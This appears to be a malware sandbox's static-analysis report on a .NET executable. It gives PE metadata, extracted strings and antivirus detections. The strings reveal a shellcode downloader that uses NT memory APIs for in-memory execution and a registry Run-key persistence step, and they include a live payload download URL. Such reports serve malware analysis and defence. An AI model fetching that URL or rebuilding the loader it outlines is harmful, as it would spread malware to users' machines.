Static | ZeroBOX

PE Compile Time

2074-01-02 02:46:42

PDB Path

C:\Users\H3OX\source\repos\ConsoleApp3\ConsoleApp3\obj\Debug\ConsoleApp3.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
| --- | --- | --- | --- | --- |
| .text | 0x00002000 | 0x00001958 | 0x00001a00 | 5.40798615096 |
| .rsrc | 0x00004000 | 0x000005f0 | 0x00000600 | 4.20477552033 |
| .reloc | 0x00006000 | 0x0000000c | 0x00000200 | 0.0815394123432 |

Resources

| Name | Offset | Size | Language | Sub-language | File type |
| --- | --- | --- | --- | --- | --- |
| RT_VERSION | 0x00004090 | 0x00000360 | LANG_NEUTRAL | SUBLANG_NEUTRAL | data |
| RT_MANIFEST | 0x00004400 | 0x000001ea | LANG_NEUTRAL | SUBLANG_NEUTRAL | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<LoadWithNT>b__8_0
Microsoft.Win32
ConsoleApp3
<Module>
PAGE_EXECUTE_READ
PAGE_GUARD
PAGE_NOCACHE
PAGE_WRITECOMBINE
MEM_RELEASE
PAGE_READWRITE
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE
MEM_RESERVE
MEM_RESET_UNDO
PAGE_NOACCESS
MEM_RESET
MEM_DECOMMIT
MEM_COMMIT
LoadWithNT
PAGE_READONLY
PAGE_WRITECOPY
PAGE_EXECUTE_WRITECOPY
value__
DownloadData
mscorlib
TypeAlloc
_disposed
<Asynchronous>k__BackingField
method
DownloadShellCode
encryptedShellCode
DecryptShellCode
shellCode
get_Message
EndInvoke
BeginInvoke
IDisposable
SafeHandle
_safeHandle
SafeFileHandle
RuntimeTypeHandle
GetTypeFromHandle
ProcessHandle
FreeConsole
WriteLine
get_None
FreeType
AllocationType
Dispose
MulticastDelegate
DebuggerBrowsableState
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
DebuggerBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
SetValue
ConsoleApp3.exe
RegionSize
bufferSize
SuppressFinalize
System.Threading
System.Runtime.Versioning
String
disposing
AsyncCallback
callback
Marshal
kernel32.dll
ntdll.dll
Program
System
CancellationToken
written
get_Location
Action
System.Reflection
PageProtection
Exception
SetRegistryStartup
ShellCodeLoader
buffer
ShellCodeCaller
TaskScheduler
CurrentUser
GetDelegateForFunctionPointer
Crypter
UIntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
Microsoft.Win32.SafeHandles
numberOfBytes
System.Threading.Tasks
TaskCreationOptions
GetCurrentProcess
BaseAddress
ZeroBits
Imports
get_Asynchronous
set_Asynchronous
Concat
Object
object
oldProtect
newProtect
System.Net
op_Explicit
get_Default
IAsyncResult
result
WebClient
StartNew
OpenSubKey
RegistryKey
GetExecutingAssembly
NtFreeVirtualMemory
NtAllocateVirtualMemory
NtWriteVirtualMemory
NtProtectVirtualMemory
get_Factory
TaskFactory
Registry
WrapNonExceptionThrows
ConsoleApp3UI
ConsoleApp3
Copyright
2024
$708169ff-d3e2-4a46-8fe3-5f5ecdb90ebf
1.0.0.0
.NETFramework,Version=v4.7.2
FrameworkDisplayName
.NET Framework 4.7.2
C:\Users\H3OX\source\repos\ConsoleApp3\ConsoleApp3\obj\Debug\ConsoleApp3.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
https://tmpfiles.org/dl/10700323/fixclient.bin
Failed to decrypt shellcode.
Failed to download shellcode.
Failed to download shellcode:
Failed to decrypt shellcode:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Failed to set registry startup:
ntdll.dll
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
ConsoleApp3UI
FileDescription
ConsoleApp3UI
FileVersion
1.0.0.0
InternalName
ConsoleApp3.exe
LegalCopyright
Copyright
2024
LegalTrademarks
ConsoleApp3
OriginalFilename
ConsoleApp3.exe
ProductName
ConsoleApp3
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Clean
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac IL:Trojan.MSILZilla.139163
Cylance Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
Alibaba Clean
K7GW Clean
Cybereason malicious.bb601f
huorong Clean
Baidu Clean
VirIT Clean
Paloalto Clean
Symantec Clean
Elastic malicious (high confidence)
ESET-NOD32 a variant of MSIL/TrojanDownloader.Agent.QWP
APEX Clean
Avast Win32:MalwareX-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.MSIL.Injuke.gen
BitDefender IL:Trojan.MSILZilla.139163
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan IL:Trojan.MSILZilla.139163
Tencent Clean
TACHYON Clean
Sophos Clean
F-Secure Trojan.TR/Dldr.Agent.wtmzn
DrWeb Clean
VIPRE IL:Trojan.MSILZilla.139163
TrendMicro Clean
McAfeeD Clean
Trapmine Clean
FireEye IL:Trojan.MSILZilla.139163
Emsisoft IL:Trojan.MSILZilla.139163 (B)
Ikarus Trojan-Downloader.MSIL.Agent
GData IL:Trojan.MSILZilla.139163
Jiangmin Clean
Webroot Clean
Varist Clean
Avira TR/Dldr.Agent.wtmzn
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Marsilia.D21E11
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.MSIL.Injuke.gen
Microsoft Program:Win32/Wacapew.C!ml
Google Detected
AhnLab-V3 Trojan/Win.RATX-gen.C5645985
Acronis Clean
McAfee Clean
MAX malware (ai score=85)
VBA32 Clean
Malwarebytes Trojan.ShellCode.MSIL
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Clean
Yandex Clean
SentinelOne Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Win32:MalwareX-gen [Trj]
DeepInstinct Clean
CrowdStrike Clean
alibabacloud Clean
No IRMA results available.